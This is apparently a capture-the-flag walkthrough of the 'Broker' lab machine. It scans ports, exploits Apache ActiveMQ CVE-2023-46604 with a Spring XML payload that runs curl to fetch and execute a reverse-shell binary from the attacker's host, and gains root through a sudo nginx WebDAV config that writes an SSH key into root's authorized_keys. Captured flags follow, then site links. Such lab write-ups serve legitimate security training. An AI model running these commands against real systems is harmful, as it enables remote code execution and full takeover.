[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升

Мартин.2025-02-12 6:05

Information Gathering

IP Address Opening Ports
10.10.11.243 TCP:22,80,1883,5672,8161,38507,61613,61614,61616

$ ip='10.10.11.243'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码 
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp    open  http       nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp  open  mqtt
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|_    ActiveMQ/Advisory/Consumer/Topic/#: 
5672/tcp  open  amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     AMQP
|     AMQP
|     amqp:decode-error
|_    7Connection from client using unsupported AMQP attempted
8161/tcp  open  http       Jetty 9.4.39.v20210325
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
|_http-server-header: Jetty(9.4.39.v20210325)
38507/tcp open  tcpwrapped
61613/tcp open  stomp      Apache ActiveMQ
| fingerprint-strings: 
|   HELP4STOMP: 
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_    java.lang.Thread.run(Thread.java:750)
61614/tcp open  http       Jetty 9.4.39.v20210325
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Jetty(9.4.39.v20210325)
61616/tcp open  apachemq   ActiveMQ OpenWire transport
| fingerprint-strings: 
|   NULL: 
|     ActiveMQ
|     TcpNoDelayEnabled
|     SizePrefixDisabled
|     CacheSize
|     ProviderName 
|     ActiveMQ
|     StackTraceEnabled
|     PlatformDetails 
|     Java
|     CacheEnabled
|     TightEncodingEnabled
|     MaxFrameSize
|     MaxInactivityDuration
|     MaxInactivityDurationInitalDelay
|     ProviderVersion 
|_    5.15.15

Apache MQ RCE

$ wget https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/archive/refs/heads/main.zip

复制代码 
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="
 http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
            <value>sh</value>
            <value>-c</value>
            <!-- The command below downloads the file and saves it as test.elf -->
	    <value>curl -s -o reverse http://10.10.16.28/reverse; chmod +x ./reverse; ./reverse</value>
        </list>
        </constructor-arg>
    </bean>
</beans>

$ go run main.go -i 10.10.11.243 -p 61616 -u http://10.10.16.28:9999/poc-linux.xml

User.txt

a178c399b0c91839399aa5b98c0c117c

Privilege Escalation: Nginx ngx_http_dav_module

sh 复制代码 
$ cat << EOF> /tmp/shell.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;

events {
    worker_connections 768;
}

http {
    server {
        listen 10031;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}
EOF

$ sudo nginx -c /tmp/shell.conf

$ ssh-keygen

$ curl -X PUT http://10.10.11.243:10031/root/.ssh/authorized_keys -d @/home/maptnh/.ssh/id_ed25519.pub

$ ssh [email protected] -i /home/maptnh/.ssh/id_ed25519

Root.txt

26eecd6da62a87d2098e474929f93140

相关推荐
Kale又菜又爱玩24 分钟前
Apache Shiro 使用教程
java·apache·springboot
陈陈爱java2 小时前
负载均衡nginx
java·服务器·nginx
wjf630003 小时前
Nginx 目录浏览功能显示的日期格式设置为数字
运维·nginx·junit
charlie1145141916 小时前
计算机网络笔记再战——理解几个经典的协议HTTP章4
网络·笔记·网络协议·学习·计算机网络·http
忧虑的乌龟蛋7 小时前
HTTP请求方法详解:GET、POST、PUT在微信小程序中的应用
网络·网络协议·tcp/ip·http·get·post·put
@ANONYME7 小时前
应用层之网络应用模型,HTTP/HTTPS协议
网络协议·http·https·p2p
SomeOtherTime17 小时前
HTTP相关问题(AI回答)
网络·网络协议·http
草明19 小时前
使用 Chrome Flags 设置(适用于 HTTP 站点开发)
前端·chrome·http
卑微小文21 小时前
住宅代理IP与机房代理IP:国内业务需求的适配选择
后端·http·html
浪裡遊1 天前
Nginx快速上手
运维·前端·后端·nginx
热门推荐
01命令行方式将mysql数据库迁移到达梦数据库(全步骤)02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek各版本说明与优缺点分析04本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程05从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑06本地部署DeepSeek教程(Mac版本)07四大AI编程工具组合测评08DeepSeek RAGFlow构建本地知识库系统09DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具10USC-HAD数据集介绍及仿真实验